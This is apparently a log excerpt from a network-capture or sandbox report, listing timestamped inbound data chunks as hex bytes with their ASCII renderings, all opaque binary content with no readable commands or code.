2021-12-01 18:25:38 UTC	82	IN	Data Raw: fa da 68 a4 cc 53 0a 6d 88 83 00 16 dc 6d 78 4f df 24 7d 66 65 81 df 2a b9 a4 d1 b9 c2 5f c1 be 5f 5d 58 eb 6d a6 6c da df 00 9f 18 37 0e 73 91 cc ba 61 2d cb 34 17 3b 71 94 5a c3 0f cc bd 0c f4 ee 40 7a bb ab da 75 14 98 4a e3 c6 62 6d a9 97 b5 5c 4b 61 f1 23 3d 03 8a ce 73 c2 cb 80 bc 6c d6 c8 b5 df ca ad 22 bc 5c f7 6e b5 37 cb d7 88 78 ce 48 fb 61 09 cb 98 51 2b a6 eb 47 b7 a1 32 4f a4 c1 70 4a 10 b9 25 c7 a2 b6 ed cd 1e a8 ed 58 5b fd f8 c1 6f 4e ea 94 9c 86 ed 89 4a 51 6c a6 bd 0d 05 d1 ac 87 18 e7 46 d6 2e 1f 91 8a 2b cb 79 cf 31 5e b0 9a 51 2a bb 11 f9 e3 b8 51 d9 2b 63 71 54 10 4f 70 1e 77 f8 56 94 ed c3 f5 37 14 f6 77 2f 9e af e7 e1 cc 07 26 a6 30 ca 42 ad ad 62 a9 e8 c6 b6 e2 83 49 59 97 96 0e 9d 76 f9 f2 c3 af fc 21 e4 b0 6f e4 2d 2a 48 ba d3 Data Ascii: hSmmxO$}fe__]Xml7sa-4;qZ@zuJbm\Ka#=sl"\n7xHaQ+G2OpJ%X[oNJQlF.+y1^QQ+cqTOpwV7w/&0BbIYv!o-*H
2021-12-01 18:25:38 UTC	83	IN	Data Raw: 6e 2f 3c 3a 88 1b ed 02 4f e2 da 99 68 cd 81 c4 24 1c 27 e1 de c0 36 09 94 3d 6e 00 52 52 88 4a 2c ff a0 38 58 5e ef 91 62 dc f1 88 86 62 57 cc a9 bb 0a 3f fb 8b 09 bc 94 20 39 86 bf a3 78 8a ad 39 3f c3 48 f1 6c df 44 c5 09 60 97 89 6a e9 7c a2 96 52 c2 38 7c a8 af 48 4e 0d 70 c1 4e 8e 7e b0 8c c4 72 c1 b6 5b 51 e5 7c 9c 2c f9 18 35 26 36 6b 8d 3b 2d 48 cb 56 fd a9 62 a9 92 ad 6c 54 06 d4 f7 dd bb 65 c5 5a 69 9f c1 3d bf 7b eb e3 fe 12 69 a6 ad ef 24 26 a2 d6 3f 38 99 4c 34 da 6d 2e c1 6f a3 60 b4 db 79 67 4e 8a 00 40 40 d8 c5 c8 82 f4 95 64 b3 c9 e6 5e d3 d8 e7 1f 40 df 44 24 1c ff 33 25 d9 d8 b3 2a 62 7b 1d 3a 2d 10 cd 0e 72 9c 76 9b 30 5b a3 21 5a 26 6e 32 3f 59 13 ea 16 fd 69 42 d0 03 0e b3 71 44 74 cf 63 3e 96 5e dc 29 b2 3a b5 ef d8 e1 a9 93 61 93 Data Ascii: n/<:Oh$'6=nRRJ,8X^bbW? 9x9?HlD`j\|R8\|HNpN~r[Q\|,5&6k;-HVblTeZi={i$&?8L4m.o`ygN@@d^@D$3%*b{:-rv0[!Z&n2?YiBqDtc>^):a
2021-12-01 18:25:38 UTC	84	IN	Data Raw: d6 de 80 52 34 31 73 c2 df 59 4c d9 72 48 3c 82 75 52 20 09 83 3f 13 cc f1 c8 b6 b0 70 bb 68 8d 69 11 cd 20 d5 a4 18 14 47 73 d5 73 4f 0b 40 93 1b 7a 7d ec a0 6a 34 ad cd e1 36 e8 a4 4f 09 27 2c 33 c7 54 6b 9d f4 b0 fa ef b3 11 91 4d e1 76 76 ed 87 1e ab cf c1 fa e2 e4 38 73 cb 61 cf 31 2e 44 64 ae 98 ab 31 1e 00 98 af 26 7d 86 b4 a4 40 27 96 bd 60 92 3f ff ba 54 90 b9 aa e3 50 88 54 e2 7d 64 8e f8 2f 30 84 9a 28 16 c4 86 47 0e 87 e0 e2 e3 65 78 29 c6 54 e9 26 05 e8 da 08 30 64 bf 95 16 ea 69 85 48 14 8f 50 28 aa 5f 59 dd 41 00 3d ae fd c8 56 cf 27 86 48 de 4f a8 7f e4 c2 5d 68 55 16 2f e0 63 2d 88 ff 67 4e 0d f3 93 05 4c f2 8d d4 49 2c 06 e6 d0 cc 44 95 66 fd 5c fa bc 00 5f 3a f1 e0 55 72 70 86 67 ed c7 25 04 8b 18 d7 d2 d1 50 17 d9 0a 2f f8 eb ea f4 be Data Ascii: R41sYLrH<uR ?phi GssO@z}j46O',3TkMvv8sa1.Dd1&}@'`?TPT}d/0(Gex)T&0diHP(_YA=V'HO]hU/c-gNLI,Df\_:Urpg%P/
2021-12-01 18:25:38 UTC	86	IN	Data Raw: fc 11 d8 d2 57 75 c6 89 da fa 96 88 d4 a3 34 7f 42 b2 d0 9f 99 2d fc c4 1e b5 1b d6 2f eb 0b b7 9e ed 42 5d 33 39 5b 08 42 8d 66 dd 4b 76 2d a1 a1 02 00 6a 5b a9 85 d3 51 88 44 e3 25 fe 0a d4 76 22 24 f3 e6 ef ee 5b 55 ef 35 75 ee ea 4b b3 4f 33 53 a1 3b 5e ab 82 64 e5 bf 60 96 5c 03 13 92 e1 47 73 12 79 d2 ac 6e e6 ea fc 28 bc ea 89 fd 83 74 18 a6 b6 54 eb e3 94 59 44 72 0d 41 43 70 8d 08 3a 31 19 4c f7 f8 83 ec 3a d0 85 6b ee f4 87 14 60 7f e0 f7 af 70 f4 8f 91 0a 57 4b 80 d9 91 15 d2 57 a4 14 93 c0 1a 6e e8 df c5 99 02 78 28 4a 0c 30 cd f8 af 1d 10 2b 3a ba 48 67 54 7a a5 54 01 0c 71 45 a3 e8 87 c6 a7 b9 18 8e bf 29 33 10 39 6b 1a ae 3f df 46 88 63 c4 80 75 b3 18 f4 f4 d8 82 88 57 2f ef 38 32 39 32 76 cf b0 7e 14 36 ca 7b 69 67 1b 21 ff 6e 8b 84 17 9b Data Ascii: Wu4B-/B]39[BfKv-j[QD%v"$[U5uKO3S;^d`\Gsyn(tTYDrACp:1L:k`pWKWnx(J0+:HgTzTqE)39k?FcuW/8292v~6{ig!n
2021-12-01 18:25:38 UTC	87	IN	Data Raw: 92 d6 34 21 91 8a f6 03 38 67 54 de 42 8c ba 45 08 36 9c c1 8a fe ab 36 03 19 22 de b1 e5 91 64 9a de b3 e5 b5 c3 d7 03 7f a1 a0 20 2c e8 ed 47 7c e6 f3 01 53 5c 9b 94 06 c8 60 38 1f 42 c8 16 ea 8d cb 9a 7a 63 a0 0b 6e 2e 9d 20 4c e0 e2 ea 24 dd e4 13 d4 b1 70 aa 83 29 af f3 f7 e7 a3 e9 91 ac b2 1a 3c f0 1c ec 57 0b f8 7e 5b 1e c9 5a 33 e1 1f 62 c9 7a 1a 77 fc f3 93 5f 6b aa 1b 8e bb 6d 23 fc e0 8d c9 17 97 50 72 af 4e 74 42 1d d1 b1 de 69 01 2b 22 ec 2d 3a fe 3a 9d 9f a6 bc db 5a a6 3a 22 8b 91 a9 84 99 35 3c 99 f0 4a 2e c8 22 9b 72 8b c6 f5 ce 3e de 4c a5 ad 48 13 49 af b7 9f 93 a9 f0 db 76 95 bb 97 e5 4c c8 23 b5 58 bd b2 ca bc 94 1d 86 28 7a 95 d4 8c 61 a8 8c 39 11 93 c5 3e f3 d5 d1 d7 88 76 1f 46 41 4a 56 77 b5 97 91 c1 3b a3 d6 33 a3 6e 16 af 3a cf Data Ascii: 4!8gTBE66"d ,G\|S\`8Bzcn. L$p)<W~[Z3bzw_km#PrNtBi+"-::Z:"5<J."r>LHIvL#X(za9>vFAJVw;3n:
2021-12-01 18:25:38 UTC	88	IN	Data Raw: 6a 76 f6 9a 39 c4 14 16 d5 7d 0b 4f 22 1f bf c9 f1 a1 df c7 80 ce 14 cf 8c bc 8f 88 32 38 95 6d c2 5d ed 66 e1 ba 16 7a 84 6c 37 15 24 99 2c 01 42 76 04 f8 49 e4 ca 15 5d 95 41 2a 9a 4e 94 93 c7 1c d0 8b cb bb 06 73 55 79 c1 54 4a 6f 0c 51 a4 41 48 d3 8e 92 52 9e c5 ca dc aa 5b 3c 0e bb 14 57 45 78 47 18 7b 37 02 23 26 7e 4d d3 a8 61 a1 bb 36 6b 17 07 a6 ee f0 f5 19 ae bf d2 c1 ea 61 2c 1e a8 18 fc 9d 2f 85 16 3e 4d 70 17 b6 b6 0c 52 1a e0 81 8a 93 46 86 c9 81 70 e5 40 23 db 91 13 e5 49 5c 1a fb 7d 61 53 17 4a e9 66 d0 41 05 06 d9 41 f0 3d 75 24 0e 7e 56 80 b7 e5 84 21 92 df fb f5 fc 3d a0 b5 e3 30 00 12 48 a5 58 e9 59 01 ab 9d 13 36 90 6a df 7c 8b 5b a1 d9 4a 44 70 56 b2 8d be 80 8f cb 47 5b b3 c2 d0 2b 05 82 01 e7 83 40 f9 27 ad b3 17 82 08 8b 20 67 37 Data Ascii: jv9}O"28m]fzl7$,BvI]A*NsUyTJoQAHR[<WExG{7#&~Ma6ka,/>MpRFp@#I\}aSJfAA=u$~V!=0HXY6j\|[JDpVG[+@' g7
2021-12-01 18:25:38 UTC	90	IN	Data Raw: 6f 60 1c 9c 25 2d 3c d0 6f fe 15 91 ab 09 45 6d 18 6f 0b e0 69 f4 2e d1 d5 21 e9 39 0b e1 e9 84 f9 cf 22 6f 59 6c 2b 4b 5a a3 3f e4 1f 32 aa aa 0d bf ed c9 97 a8 b4 18 d9 a8 b0 54 49 ca a2 dd 6e c2 20 ed 24 70 da 85 bc f3 b8 e0 1c 25 ed f6 e0 14 15 7f 99 ff 77 54 4d 37 57 33 f1 50 aa 0e 7b 02 31 c1 60 d7 4d c2 f6 66 8b d8 16 16 e2 63 a5 ae 78 67 48 e5 1e f5 37 fa 93 0b 69 aa 10 62 6d 3e 38 5d 03 a9 90 eb cb 57 0c 3b 62 2c 3a cf f0 9f 09 52 0f c7 e8 b6 93 bf 56 73 b5 68 5b 16 ce 02 71 b5 a6 f3 0e 46 cd 31 70 10 ba 23 8e c9 5f 3f d8 82 7d c1 2c b8 af 9c fd a0 d0 ff fe c3 d5 b9 61 5e 0a e6 7b 3f a6 54 25 32 93 bc 0f 12 f2 f7 72 c2 77 26 ae 28 11 fd 13 47 84 7d 82 c4 d5 a8 e0 57 5a 54 63 5a 05 6f f0 99 5e db c1 46 a5 b7 4f f3 1b 8b aa de c9 23 db 51 e3 bc 19 Data Ascii: o`%-<oEmoi.!9"oYl+KZ?2TIn $p%wTM7W3P{1`MfcxgH7ibm>8]W;b,:RVsh[qF1p#_?},a^{?T%2rw&(G}WZTcZo^FO#Q
2021-12-01 18:25:38 UTC	91	IN	Data Raw: 7d df 66 4d 34 04 2e 96 f1 dc 45 eb 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 14 4e 77 7c 8b 5b 28 85 6e 6c 20 db fe a9 9a 68 95 2b b9 a4 e2 4f 94 0f 29 d2 8c a3 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 99 ab a0 3d f0 a4 75 a9 b5 ee cd 37 63 43 30 8c ea 67 1a 6e 8b 9a 85 98 60 4b a3 c0 2c 29 cb f0 21 75 31 fe 87 33 d0 31 21 22 20 a0 25 34 52 4a 08 d4 b6 6e 38 7a 3f 3f cd 80 30 b7 04 14 fd 46 1d ad d7 59 14 2f b3 a0 32 4f f4 97 Data Ascii: }fM4.Emcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!AH,zZ.;!i_`Z%(Nw\|[(nl h+O)h/jBn37$Z=u7cC0gn`K,)!u131!" %4RJn8z??0FY/2O
2021-12-01 18:25:38 UTC	92	IN	Data Raw: ca 6b c9 18 37 fe 8a dc cd ff 0e 7a 02 cf 57 48 62 48 b2 27 fc 1b b4 8a 83 ad 30 0d a9 72 8f 52 b4 65 bc c3 2a 6d 43 42 cf 41 c2 42 48 5d 14 c2 59 03 26 4f 46 4a 77 b6 12 8a d8 84 23 dc f4 26 5d 9f ca de 33 de 3e b5 3d 6e 5d 7d 73 e8 ae f5 76 1f 91 02 21 d3 6e ba 60 0c fb 1f f8 d4 19 8f 81 06 cb eb d8 8d 66 9e 5d 73 8c ec a6 a1 50 8a b1 35 1d 82 44 ff 80 e6 e2 b6 85 40 86 93 6d af f0 61 00 7e 0c 2c 45 84 46 c4 cc a7 f1 6a c4 12 8c ca b2 12 7b a4 79 0b 1b 8f f0 2d 97 d0 15 3c f2 92 aa 4c 32 f0 78 1b f7 18 ff e1 ee 9b ef 39 ce c2 2a 5b ce 6b 7a 7f 17 3d 03 db 0e d3 07 37 c0 1d 00 b2 ba 53 bf 4c b0 75 0e e8 b9 e2 e2 ce 1b a7 2a 74 59 e0 f7 86 88 74 c8 cf e5 9b f9 6a c5 3d e7 83 77 9c 90 2c d2 37 fa aa a0 6d d9 a9 06 06 d8 8a 24 38 b7 ec 66 cd d3 a4 3d b9 9a Data Ascii: k7zWHbH'0rRemCBABH]Y&OFJw#&]3>=n]}sv!n`f]sP5D@ma~,EFj{y-<L2x9[kz=7SLu*tYtj=w,7m$8f=
2021-12-01 18:25:38 UTC	93	IN	Data Raw: ee d3 16 99 e9 88 72 ef 8b 72 c2 66 68 97 36 5a 2e 40 5e b2 7b 40 f5 ba 46 ee a0 28 5f 80 b4 13 8d b2 f3 5a a7 91 6b 05 82 9a 5b de 66 3a 1e 13 e5 7b 4b ea 00 08 49 af 97 c6 f4 48 f3 4a d0 c8 87 2b 94 0f 29 82 f9 d1 c2 2b c8 c6 8d 97 2f 6a b7 42 df 98 bc 2f 13 47 51 af fe 99 2c aa eb df d5 5c 9c 84 13 dc db 8d b9 5e 0c 2d 10 fb 8b 14 3a 0d ea f6 e9 fd 04 65 83 94 44 40 b8 d0 48 06 11 9f a7 55 b1 45 40 4e 00 c5 57 46 3d 38 24 f4 d7 00 5c 5a 56 51 a9 e9 53 d6 70 71 8e 66 7c 8d a4 3c 66 46 dc d5 41 6f 91 e5 6a 39 e4 d8 4c c1 ce 64 c4 a8 c1 d4 84 59 76 98 18 21 fd c6 74 1f a5 64 ce 51 cd 21 b4 2c 2a 00 5d 16 9d f7 f9 c3 fd 5f de 8f 00 1b 7b 46 34 6f 81 cd 1e 3c f6 a1 f6 8d 74 e6 ef c9 26 7d 0b b8 3a 7a 2a 79 6e 48 fc 32 c8 dd 3c dc 9c 92 90 db 3a b2 9c bf bd Data Ascii: rrfh6Z.@^{@F(_Zk[f:{KIHJ+)+/jB/GQ,\^-:eD@HUE@NWF=8$\ZVQSpqf\|<fFAoj9LdYv!tdQ!,]_{F4o<t&}:zynH2<:
2021-12-01 18:25:38 UTC	95	IN	Data Raw: 70 52 ba b8 0c a6 5f 48 53 cc 9d 38 79 ca 24 95 05 7e 9e 84 73 a2 c2 f0 a0 08 0f 89 b4 0f 4d 21 77 ac e6 14 b6 8a 6e c7 72 4c d6 93 50 a2 b0 71 8f 66 84 1a c4 80 a7 9f 1f 05 be a1 36 34 c2 4a 04 41 0b ba c0 32 a5 d6 a4 b3 90 b6 6e 1e 9c 6e 50 6d 1b 54 57 3b 69 a1 17 26 c3 bd e1 59 8a ab c6 5f 7f 92 72 bf 26 96 d7 ff 44 ad 6c 61 46 85 c9 a6 1b 66 3f c9 f1 ab 5e 62 49 84 94 79 a6 14 4e 72 86 27 3b 1d 47 a4 5c a7 f4 21 b6 08 51 12 19 25 2c b6 6d 80 29 a4 a8 07 f0 a5 15 6c be 21 b2 f4 56 7a d0 d6 d9 24 20 d5 50 99 89 28 5e aa 60 ad d5 9f 89 71 1c 12 da e4 9a 1e 11 8e 76 5c 9b 82 d0 26 be ea 25 a2 63 54 87 b0 7d 2a 24 ae 2a e6 09 00 b4 26 30 ff d5 08 0b 73 af 2f 9b a1 a1 60 53 8c a8 ad 14 a6 64 7a 76 56 cd 14 9d 0e c2 29 60 83 c5 a6 14 7a 84 3f 67 fd c3 7c d2 Data Ascii: pR_HS8y$~sM!wnrLPqf64JA2nnPmTW;i&Y_r&DlaFf?^bIyNr';G\!Q%,m)l!Vz$ P(^`qv\&%cT}$&0s/`SdzvV)`z?g\|
2021-12-01 18:25:38 UTC	96	IN	Data Raw: 6e 6f 37 71 dd e8 b9 3f c3 eb ab 80 3d b4 a4 14 a9 c1 ee ac 37 3f 43 7c 8c 85 67 79 6e ea 9a e9 98 40 4b f0 c0 58 29 aa f0 55 75 54 fe 87 33 d0 31 21 22 20 a0 79 34 04 4a 61 d4 c0 6e 59 7a 53 3f a9 80 59 b7 58 14 a8 46 6e ad b2 59 66 2f 93 a0 76 4f 95 97 6c 56 f7 f8 79 af aa 10 c9 cd 87 bd 88 29 6f fd 19 44 e7 b2 49 6b 80 0b cf 71 c5 47 fd 58 2c 65 5d 77 a9 87 f4 aa ea 3e cb e6 6f 75 7b 46 34 37 85 95 05 64 c1 a1 9b c9 7e 84 fe ae 49 7d 57 f1 10 10 3d 1a 7b 21 f5 55 91 e9 52 80 93 eb b6 af 2c df ca 8d 93 47 d7 ab a7 84 fb 28 e9 c5 8f 0f f5 c6 ac 1d f9 9d 4a d6 f7 58 0e 63 d5 80 d1 af 05 64 21 e0 96 61 04 d5 b7 45 83 3a 60 27 da 2d 7e be bc 6e 91 15 03 9e 5e d8 5c 18 c7 0e f4 f4 e5 2e a2 d5 40 e9 b7 1f 8f e9 ea 72 ae 3a a7 0c 1f a0 7b a2 5a 71 cc 92 72 90 Data Ascii: no7q?=7?C\|gyn@KX)UuT31!" y4JanYzS?YXFnYf/vOlVy)oDIkqGX,e]w>ou{F47d~I}W={!UR,G(JXcd!aE:`'-~n^\.@r:{Zqr
2021-12-01 18:25:38 UTC	97	IN	Data Raw: 3c 05 ba 17 55 95 b3 94 53 fe 9c aa 6c 0c b2 24 ba 53 9d a3 9a 12 90 19 58 32 b3 a7 b6 76 71 4d 88 85 8a 17 77 2c 9d e7 18 f0 29 3b 52 f2 0f 5e 0a 0e b1 39 a6 f4 01 b6 5b 07 07 6c 28 58 84 1f 80 4c a4 a8 07 b9 a5 7b 30 ca 6c d7 9d 24 19 be a4 bc 4b 54 a6 70 f6 cc 4e 26 de 10 f1 b9 da e6 15 6e 75 bf 81 e8 42 11 db 26 2f e9 e7 bf 54 d8 ca 4c e6 0f 35 e2 c4 7d 4b 42 f2 43 a2 7b 65 d1 40 56 9e ba 7d 73 1f 81 5b fe fd d9 2c 36 e3 a8 ca 48 cf 02 14 1f 76 bf 50 f8 6f a4 5d 0f e2 bd a6 3a 7a e1 3f 1f fd a6 20 d2 fe c1 b2 54 75 80 c0 bd 17 27 95 78 79 a5 24 e4 c0 59 09 0c f9 cc bb 07 1f 51 38 a4 d9 a8 4b 7f 53 dc 41 44 2c 9b 82 50 df b7 99 3e 2e 19 20 65 bb 78 07 df 6d 10 6a 14 37 52 7f 6c 12 50 f3 40 0c 1b 44 95 e8 83 06 bd f8 7f 71 c3 51 2e 51 4a e0 3a 2b 9c d0 Data Ascii: <USl$SX2vqMw,);R^9[l(XL{0l$KTpN&nuB&/TL5}KBC{e@V}s[,6HvPo]:z? Tu'xy$YQ8KSAD,P>. exmj7RlP@DqQ.QJ:+
2021-12-01 18:25:38 UTC	98	IN	Data Raw: e0 d5 11 4d 56 1c b5 fc 6e 4a 53 6e 71 41 a3 d4 93 26 cd 73 70 56 ba 8c 0c f9 5f 0b 53 8e 9d 6e 79 89 24 f8 05 1a 9e 93 73 f4 c2 c0 a0 10 0f f5 b4 2f 4d 65 77 fd e6 79 b6 fe 6e 96 72 68 d6 c0 50 96 b0 2b 8f 24 84 71 c4 fa a7 f0 1f 31 be a7 36 3c c2 1e 04 72 0b ba c0 34 a5 d2 a4 ef 90 fb 6e 2b 9c 40 50 76 1b 58 57 3a 69 a1 17 33 c3 a6 e1 63 8a 90 c6 65 7f b1 72 b2 26 92 d7 ff 44 ad 6c 05 46 c3 c9 ed 1b 24 3f b5 f1 a0 5e 76 49 84 94 74 a6 27 4e 51 86 23 3b 22 47 95 5c b9 f4 6e b6 3d 51 0f 19 28 2c a7 6d 96 29 f8 a8 48 f0 d0 15 44 be 00 b2 f2 56 76 d0 cf d9 17 20 9f 50 c5 89 79 5e eb 60 b2 d5 9c 89 53 1c 45 da b5 9a 73 11 e8 76 1e 9b d6 d0 65 be ae 25 d5 63 77 87 fc 7d 73 24 b3 2a 92 09 55 b4 71 30 ae d5 49 0b 5d af 69 9b bc a1 1a 53 d5 a8 fd 14 f9 64 14 76 Data Ascii: MVnJSnqA&spV_Sny$s/MewynrhP+$q16<r4n+@PvXW:i3cer&DlF$?^vIt'NQ#;"G\n=Q(,m)HDVv Py^`SEsve%cw}s$*Uq0I]iSdv
2021-12-01 18:25:38 UTC	99	IN	Data Raw: 4f b6 0f 29 d2 ae a3 da 68 a9 aa e1 97 6b 3a f6 12 96 98 bc 6e 21 13 24 dd df a4 5a c3 99 8b a0 3d f0 94 75 a9 b5 c0 cd 37 11 43 45 8c 8e 67 6a 6e 8b 9a 85 98 3c 4b ea c0 6f 29 8a f0 62 75 7d fe d4 33 fe 31 44 22 58 a0 40 34 52 4a 54 d4 ce 6e 5b 7a 50 3f bd 80 49 b7 2a 14 98 46 65 ad b2 59 14 2f b3 a0 12 4f d6 97 18 56 96 f8 07 af ce 10 83 cd a6 bd bb 29 5b fd 3b 44 c7 b2 2f 6b be 0b 80 71 88 47 c7 58 6f 65 4c 77 c0 87 a4 aa b3 3e 9a e6 55 75 53 46 7b 37 90 95 6f 64 86 a1 b5 c9 58 84 b3 ae 60 7d 2b f1 7b 10 1b 1a 1a 21 92 55 a2 e9 7d 80 bf eb 93 af 1b df ce 8d 95 47 96 ab bf 84 d6 28 f2 c5 8d 0f c8 c6 8c 1d ca 9d 6e d6 f9 58 0d 63 92 80 ee af 14 64 40 e0 be 61 20 d5 c7 45 f3 3a 24 27 bb 2d 56 be 9e 6e a2 15 22 9e 5e d8 5b 18 c9 0e c4 f4 fd 2e 97 d5 4e e9 Data Ascii: O)hk:n!$Z=u7CEgjn<Ko)bu}31D"X@4RJTn[zP?I*FeY/OV)[;D/kqGXoeLw>UuSF{7odX`}+{!U}G(nXcd@a E:$'-Vn"^[.N
2021-12-01 18:25:38 UTC	100	IN	Data Raw: 05 58 db 94 46 e0 b7 e9 b3 cc b6 2d 42 e9 23 22 04 69 37 32 49 07 ce 63 55 80 d2 8e 3f e4 df b2 03 0d d7 1d db 4a f1 84 9a 21 f1 18 34 1a f6 9a c3 7e 14 4d e9 87 ef 37 03 2a f0 f1 18 d5 48 12 3e d2 48 5e 7e 35 c5 31 cb a7 01 d3 5b 23 66 6f 44 45 c2 0e e5 4c a4 a8 07 b9 a5 78 30 df 6c d5 9d 33 19 80 a4 b8 4b 54 a6 38 f6 89 4e 2d de 16 f1 b6 da e1 15 73 75 a9 81 ee 42 3f db 13 2f e3 e7 b5 54 be ca 56 e6 15 35 e4 c4 15 4b 4b f2 59 a2 7d 65 9a 40 55 9e ad 7d 6e 1f 8f 5b b6 fd ca 2c 53 e3 a8 ca 57 cf 01 14 04 76 b9 50 cd 6f b0 5d 0f e2 b5 a6 47 7a f2 3f 04 fd c3 20 81 fe a4 b2 7b 75 be c0 bb 17 32 95 7f 79 8c 24 e6 c0 4e 09 50 f9 8a bb 3d 1f 46 38 b3 d9 b8 4b 79 53 c7 41 7d 2c e8 82 61 df a6 99 25 2e 16 20 7a bb 71 07 ba 6d 63 6a 69 37 62 7f 51 12 6d f3 05 0c Data Ascii: XF-B#"i72IcU?J!4~M7*H>H^~51[#foDELx0l3KT8N-suB?/TV5KKY}e@U}n[,SWvPo]Gz? {u2y$NP=F8KySA},a%. zqmcji7bQm
2021-12-01 18:25:38 UTC	102	IN	Data Raw: cd f3 30 97 04 61 fd 35 1d c8 d7 2b 14 5c b3 a0 32 3b f4 f2 18 24 96 95 25 dc ee 62 ac bb e1 93 e9 4d 1a 91 75 28 93 b2 15 0e cc 73 a0 01 a2 2b 94 37 42 17 7d 12 ed f5 95 84 9e 5b aa 9e 6f 10 7b 46 34 37 d9 c1 46 25 ae f2 f6 82 11 e9 9a c9 26 0f 0b df 54 75 4f 62 1a 44 92 55 fe b9 3c f2 cf 84 e3 cc 5f ba af fe e1 34 f7 e3 e3 e5 9a 4b 9d ae ee 6a a9 b4 e0 33 96 f8 29 ae 96 3d 62 63 f5 f2 82 ca 71 03 40 85 e2 05 61 bc b7 31 83 14 60 42 da 55 22 db ff 6e fe 15 6e 9e 31 d8 38 18 a8 0e a8 f4 a1 40 d0 a1 21 8d d0 73 e0 85 84 5c f2 5e f2 60 6c cc 1e a2 28 3d 88 e0 71 f5 e5 9c bb 87 81 3d 9d 2a 6b ee 16 a1 c4 82 bb 4c fb 6e 2a 41 4c b6 c1 0f ce 55 c7 cc ae 29 79 8d 30 69 67 50 0d 14 a5 19 c9 18 37 c2 42 b1 9e 9a 7a 36 63 42 b5 de 75 23 f1 c4 a8 c4 56 e5 31 e2 e8 Data Ascii: 0a5+\2;$%bMu(s+7B}[o{F47F%&TuObDU<_4Kj3)=bcq@a1`BU"nn18@!s\^`l(=q=kLnALU)y0igP7Bz6cBu#V1
2021-12-01 18:25:38 UTC	103	IN	Data Raw: 29 c2 a8 73 f0 d2 15 51 be 1e b2 f8 56 45 d0 e9 d9 22 20 c5 50 84 89 21 5e ad 60 9e d5 bc 89 61 1c 29 da d6 9a 2b 11 b5 76 4b 9b 88 d0 23 be b9 25 c6 63 7b 87 90 7d 17 24 b1 2a d7 09 17 b4 32 30 fb d5 13 0b 6b af 0d 9b 98 a1 5e 53 90 a8 a3 14 a0 64 7a 76 2a cd 07 9d 06 c2 33 60 86 c5 c9 14 0d 84 4c 67 fd c3 20 d2 a2 c1 c2 08 07 cd af d2 70 5d e7 11 18 c9 49 88 b3 38 27 50 9b 8a da 6e 6b 23 38 c1 bf ce 24 10 21 a4 61 18 03 9b c4 20 ff c5 bb 51 5b 7f 53 0c de 14 65 ba 0c 63 09 3a 5c 3b 0e 02 32 39 87 40 63 1b 2f c9 8d ef 68 d2 8b 18 4c aa 7b 40 73 39 c0 14 0e f6 f5 c2 42 62 e4 80 97 b2 fb 8f c8 8f c2 28 00 6e ef 69 cd 29 83 79 39 79 05 90 24 cb 09 69 98 1a 70 00 3e 8f 2b 64 92 9d f3 16 fd e9 b2 21 8a d9 64 f0 6d 2c 9a 7a 5a 2e 37 3b 80 08 51 92 af 04 ed d8 Data Ascii: )sQVE" P!^`a)+vK#%c{}$20k^Sdzv3`Lg p]I8'Pnk#8$!a Q[Sec:\;29@c/hL{@s9Bb(ni)y9y$ip>+d!dm,zZ.7;Q
2021-12-01 18:25:38 UTC	104	IN	Data Raw: 10 22 1a 7f 21 bc 55 9b e9 44 80 aa eb e3 af 5f df af 8d e1 47 ab ab a2 84 ea 28 ed c5 aa 0f c8 c6 94 1d f7 9d 75 d6 da 58 0d 63 96 80 e3 af 1d 64 1c e0 a5 61 0e d5 d8 45 e4 3a 0c 27 bf 2d 7e be bc 6e 96 15 1c 9e 5e d8 55 18 cd 0e f4 f4 f4 2e a3 d5 44 e9 a2 1f c0 e9 c0 72 93 3a 86 0c 0d a0 1e a2 28 71 b0 92 77 90 e1 cc b9 e8 a6 58 98 5f 6d 8b 36 c5 fc f0 92 3f e7 6e 49 13 59 da e3 7b c1 21 e1 b8 b4 5a 42 e2 13 06 78 15 1a 66 88 6b a8 18 54 90 5d dd b8 ff 7e 7a 02 31 b9 89 7f 4d ad f6 9d b6 5d 8a 6d e2 8d f0 2e f3 4c 40 48 1a e0 0c 73 e5 2e 42 4a 41 d0 6c 4c c7 07 f7 55 68 57 9e 78 e4 92 b6 f2 c5 6e 0c 03 5c 72 19 ac 8e d6 3c 51 37 1d d1 f5 01 6e 73 7a 5c 13 cf 8f fc 64 e0 5e 1f 3d c9 ab 62 ad 3d 50 2b 92 f7 32 1b 98 09 e4 61 42 ed 96 11 ab a7 af 93 4c 22 Data Ascii: "!UD_G(uXcdaE:'-~n^U.Dr:(qwX_m6?nIY{!ZBxfkT]~z1M]m.L@Hs.BJAlLUhWxn\r<Q7nsz\d^=b=P+2aBL"
2021-12-01 18:25:38 UTC	106	IN	Data Raw: 76 30 51 9d 6f ec 29 05 9a b1 a6 14 7a 79 2e 67 fd 34 20 d2 fe ef c6 6d 0d b9 e4 b6 7e 5d 95 11 79 3d 36 88 c0 c1 45 51 f9 a4 cf 0b 67 57 1c ac b7 ce 4b 10 53 49 1e 19 2c 11 82 20 df eb ed 34 56 0b 04 75 df 14 07 ba 6d 63 1a 3b 37 ab 7c 02 12 17 9a 24 6d 6f 25 ed dd ef 06 d2 f8 88 02 ab 51 fc 64 39 e0 3a 59 92 b1 b6 62 62 c4 cc 57 b3 95 b7 e9 8f ea 06 50 0a 8e 1d ac 0d c3 03 30 1d 13 f7 45 cb 7b ed 46 1b 70 18 3f 8f 09 4a d2 f9 b2 62 f8 cd ef 21 aa d9 41 6c e3 2d db 6e 5a 2e 0d 15 a8 6c 40 e6 be 20 b2 d8 69 5f c1 77 cb e9 c0 17 59 a7 d0 2b 4c 87 88 5c da 30 7a 77 7c 8b 5b 68 2a 6f 6c 1c d4 fe a9 b4 01 f1 4a cd c5 c6 79 94 0f 29 d2 8c 63 a6 68 ad aa e1 97 01 29 e5 16 fb c0 ff 2f 33 37 24 dd 9f 79 5b c3 b5 ab a0 3d de e7 27 fd 91 b6 8e 62 63 43 30 8c da 